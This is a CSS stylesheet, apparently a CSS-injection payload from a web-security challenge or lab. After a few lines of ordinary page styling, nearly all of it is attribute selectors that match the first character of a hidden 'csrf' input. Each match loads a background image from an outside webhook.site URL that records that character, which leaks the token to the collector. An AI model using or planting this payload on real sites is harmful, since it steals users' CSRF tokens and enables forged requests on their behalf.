html, body {
	width: 100%;
	margin: 0;
	padding: 0;
	color: #ffffff;
	background: #c94c4c;
}

input[name=csrf][value^=a]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/a); }
input[name=csrf][value^=b]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/b); }
input[name=csrf][value^=c]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/c); }
input[name=csrf][value^=d]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/d); }
input[name=csrf][value^=e]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/e); }
input[name=csrf][value^=f]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/f); }
input[name=csrf][value^=g]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/g); }
input[name=csrf][value^=i]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/i); }
input[name=csrf][value^=h]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/h); }
input[name=csrf][value^=j]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/j); }
input[name=csrf][value^=k]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/k); }
input[name=csrf][value^=l]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/l); }
input[name=csrf][value^=m]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/m); }
input[name=csrf][value^=n]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/n); }
input[name=csrf][value^=o]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/o); }
input[name=csrf][value^=p]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/p); }
input[name=csrf][value^=q]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/q); }
input[name=csrf][value^=r]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/r); }
input[name=csrf][value^=s]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/s); }
input[name=csrf][value^=t]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/t); }
input[name=csrf][value^=u]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/u); }
input[name=csrf][value^=v]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/v); }
input[name=csrf][value^=w]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/w); }
input[name=csrf][value^=x]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/x); }
input[name=csrf][value^=y]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/y); }
input[name=csrf][value^=z]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/z); }





input[name=csrf][value^=A]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/A); }
input[name=csrf][value^=B]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/B); }
input[name=csrf][value^=C]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/C); }
input[name=csrf][value^=D]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/D); }
input[name=csrf][value^=E]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/E); }
input[name=csrf][value^=F]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/F); }
input[name=csrf][value^=G]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/G); }
input[name=csrf][value^=H]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/H); }
input[name=csrf][value^=I]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/I); }
input[name=csrf][value^=J]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/J); }
input[name=csrf][value^=K]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/K); }
input[name=csrf][value^=L]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/L); }
input[name=csrf][value^=M]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/M); }
input[name=csrf][value^=N]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/N); }
input[name=csrf][value^=O]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/O); }
input[name=csrf][value^=P]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/P); }
input[name=csrf][value^=Q]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/Q); }
input[name=csrf][value^=R]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/R); }
input[name=csrf][value^=S]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/S); }
input[name=csrf][value^=T]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/T); }
input[name=csrf][value^=U]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/U); }
input[name=csrf][value^=V]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/V); }
input[name=csrf][value^=W]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/W); }
input[name=csrf][value^=X]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/X); }
input[name=csrf][value^=Y]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/Y); }
input[name=csrf][value^=Z]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/Z); }



input[name=csrf][value^="0"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/0); }
input[name=csrf][value^="1"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/1); }
input[name=csrf][value^="2"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/2); }
input[name=csrf][value^="3"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/3); }
input[name=csrf][value^="4"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/4); }
input[name=csrf][value^="5"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/5); }
input[name=csrf][value^="6"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/6); }
input[name=csrf][value^="7"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/7); }
input[name=csrf][value^="8"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/8); }
input[name=csrf][value^="9"]{ background-image: url(https://webhook.site/20c9d334-0972-4926-a367-5162dba6b969/9); }



